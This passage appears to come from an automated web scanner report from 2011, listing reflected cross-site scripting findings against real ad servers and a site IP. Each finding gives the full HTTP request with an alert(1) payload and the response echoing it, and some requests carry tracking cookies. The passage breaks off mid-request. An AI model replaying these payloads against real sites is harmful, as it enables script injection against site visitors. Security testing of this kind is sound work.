GET /javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e62"><script>alert(1)</script>08c4388e43e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e');" title="Email Page">
...[SNIP]...

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25012"><script>alert(1)</script>0614a672642 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=25012"><script>alert(1)</script>0614a672642 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423009; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=25012"><script>alert(1)</script>0614a672642http://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191ab'%3balert(1)//d0c8695572d was submitted in the @CPSC@ parameter. This input was echoed as 191ab';alert(1)//d0c8695572d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=191ab'%3balert(1)//d0c8695572d HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423011; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4559
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
e('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_multiclick=clickTAG1&click=191ab';alert(1)//d0c8695572dhttp://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
...[SNIP]...

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b203b'-alert(1)-'669cb54d170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&b203b'-alert(1)-'669cb54d170=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423027; expires=Sat, 11 May 2013 23:37:21 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:21 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4308
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&ml_multiclick=clickTAG1&click=&b203b'-alert(1)-'669cb54d170=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
clickTAGs += '&swfPATH=' + escape('http://ad.amtk-media.com/xl/PROD/17298
...[SNIP]...

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 986e2"><script>alert(1)</script>7e56d92a0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&986e2"><script>alert(1)</script>7e56d92a0c0=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:20 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423020; expires=Sat, 11 May 2013 23:37:20 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:20 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4355
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&click=&986e2"><script>alert(1)</script>7e56d92a0c0=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.8. http://ad.amtk-media.com/iframe [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf39"><script>alert(1)</script>7af5e74697d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blankaaf39"><script>alert(1)</script>7af5e74697d&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422991; expires=Sat, 11 May 2013 23:37:18 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:18 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blankaaf39"><script>alert(1)</script>7af5e74697d" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=http://www.amtrak.c
...[SNIP]...

4.9. http://ad.amtk-media.com/iframe [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971a3'%3balert(1)//62435de2831 was submitted in the target parameter. This input was echoed as 971a3';alert(1)//62435de2831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank971a3'%3balert(1)//62435de2831&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422997; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4557
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
s/amt_acl_plug_f_728x90_arn.dir/amt_acl_plug_f_728x90_arn.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 90/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank971a3';alert(1)//62435de2831' + '&clickTAG=' + escape('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_mul
...[SNIP]...

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df75a"-alert(1)-"b55e37a950c was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce0c'-alert(1)-'8511ba05b59 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6341e"-alert(1)-"0ee272f6ed was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var w
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b0f4'-alert(1)-'e7171bb264d was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt17b0f4'-alert(1)-'e7171bb264d&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
